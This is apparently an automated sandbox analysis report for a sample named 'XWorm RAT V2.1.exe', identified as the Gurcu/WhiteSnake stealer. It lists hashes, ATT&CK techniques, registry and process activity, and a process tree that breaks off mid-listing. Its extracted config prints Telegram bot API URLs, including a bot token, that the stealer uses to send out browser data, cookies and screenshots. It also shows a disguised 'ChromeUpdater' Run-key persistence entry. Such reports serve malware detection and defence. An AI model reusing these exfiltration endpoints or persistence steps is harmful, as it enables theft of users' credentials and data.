gurcu | ea9258e9975b8925a739066221d996aef19b4ef4f4c91524f82e39d403f25579

Resubmissions

18/12/2024, 00:13

241218-ah91wavqgj 3

17/12/2024, 19:15

241217-xyj6qavncs 10

Analysis

max time kernel
422s
max time network
423s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17/12/2024, 19:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XWorm RAT V2.1.exe
Size

2.2MB
MD5

835f081566e31c989b525bccb943569c
SHA1

71d04e0a86ce9585e5b7a058beb0a43cf156a332
SHA256

ea9258e9975b8925a739066221d996aef19b4ef4f4c91524f82e39d403f25579
SHA512

9ec58f8c586ecf78ef8d75debc5dba58544558566423a634724bb5ab192aaf64f9ccbee9a5af48124a3366b2a7d24b4db71bb5743978201b881c08bad8f6fb0c
SSDEEP

49152:LdYJMfC7koydmRzCxWO8e89khof23mKijV6WvFw3BAz2tIm0U:qc3vdUEWFySfdw3rtIm

Score

10^/10

gurcu agilenet discovery motw persistence phishing spyware stealer

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendDocument?chat_id=2024893777&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0%20kb)%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%84%20-%20BrowserDownloads.txt%20(0.22%20kb

https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendMessage?chat_id=2024893777

https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendDocument?chat_id=2024893777&caption=%F0%9F%93%B8Screenshot%20take

https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/getUpdates?offset=-

Signatures

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu
A potential corporate email address has been identified in the URL: =@L
phishing

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Command Reciever.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Update.exe

Executes dropped EXE 2 IoCs

pid	Process
6516	Command Reciever.exe
8004	Update.exe

Loads dropped DLL 3 IoCs

pid	Process
6516	Command Reciever.exe
8004	Update.exe
6400	XHVNC.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral2/memory/6400-1173-0x00000000061C0000-0x00000000063E4000-memory.dmp	agile_net

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLogger\\Update.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
907	raw.githubusercontent.com
908	raw.githubusercontent.com
917	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
904	ip-api.com

Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs

phishing motw

flow	ioc
756	https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
7592	tasklist.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XWorm RAT V2.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Command Reciever.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XHVNC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Command Reciever.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XWorm RAT V2.1.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Update.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Command Reciever.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Command Reciever.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Update.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
7428	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133789367659088434"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	chrome.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2864	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4476	chrome.exe
4476	chrome.exe
6516	Command Reciever.exe
6516	Command Reciever.exe
6516	Command Reciever.exe
6516	Command Reciever.exe
6516	Command Reciever.exe
6516	Command Reciever.exe
6516	Command Reciever.exe
6516	Command Reciever.exe
6516	Command Reciever.exe
6516	Command Reciever.exe
6516	Command Reciever.exe
6516	Command Reciever.exe
6516	Command Reciever.exe
6516	Command Reciever.exe
6516	Command Reciever.exe
6516	Command Reciever.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
2936	chrome.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe
8004	Update.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
6620	Command Reciever.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe
Token: SeShutdownPrivilege	4476	chrome.exe
Token: SeCreatePagefilePrivilege	4476	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe

Suspicious use of SendNotifyMessage 33 IoCs

pid	Process
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
4476	chrome.exe
6620	Command Reciever.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
8004	Update.exe
6400	XHVNC.exe
6400	XHVNC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4476 wrote to memory of 4400	4476	chrome.exe	94
PID 4476 wrote to memory of 4400	4476	chrome.exe	94
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 4564	4476	chrome.exe	95
PID 4476 wrote to memory of 3808	4476	chrome.exe	96
PID 4476 wrote to memory of 3808	4476	chrome.exe	96
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97
PID 4476 wrote to memory of 5092	4476	chrome.exe	97

C:\Users\Admin\AppData\Local\Temp\XWorm RAT V2.1.exe
"C:\Users\Admin\AppData\Local\Temp\XWorm RAT V2.1.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:2488

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffb3a71cc40,0x7ffb3a71cc4c,0x7ffb3a71cc58
  2⤵
  PID:4400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1820,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1748 /prefetch:2
  2⤵
  PID:4564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2160,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2388 /prefetch:3
  2⤵
  PID:3808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2232,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2396 /prefetch:8
  2⤵
  PID:5092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3084,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:4288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:1
  2⤵
  PID:4392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3688,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4548 /prefetch:1
  2⤵
  PID:4684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4748,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:8
  2⤵
  PID:1804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4916,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4852 /prefetch:8
  2⤵
  PID:4776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4852,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5156 /prefetch:8
  2⤵
  PID:2468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5308,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5304 /prefetch:8
  2⤵
  PID:3772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5176,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5280 /prefetch:8
  2⤵
  PID:4840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5172,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5168 /prefetch:8
  2⤵
  PID:2912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5152,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5372 /prefetch:2
  2⤵
  PID:1400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5392,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5412 /prefetch:1
  2⤵
  PID:1132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=3420,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3344 /prefetch:1
  2⤵
  PID:2592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3184,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4520 /prefetch:1
  2⤵
  PID:1936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5224,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5612 /prefetch:1
  2⤵
  PID:3176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5084,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5292 /prefetch:1
  2⤵
  PID:2276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=4072,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5072 /prefetch:1
  2⤵
  PID:3116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5272,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5704 /prefetch:1
  2⤵
  PID:4796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5852,i,8026405344260852752,4505671105018921736,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5840 /prefetch:1
  2⤵
  PID:1908
- C:\Program Files\Google\Chrome\Application\chrome.exe
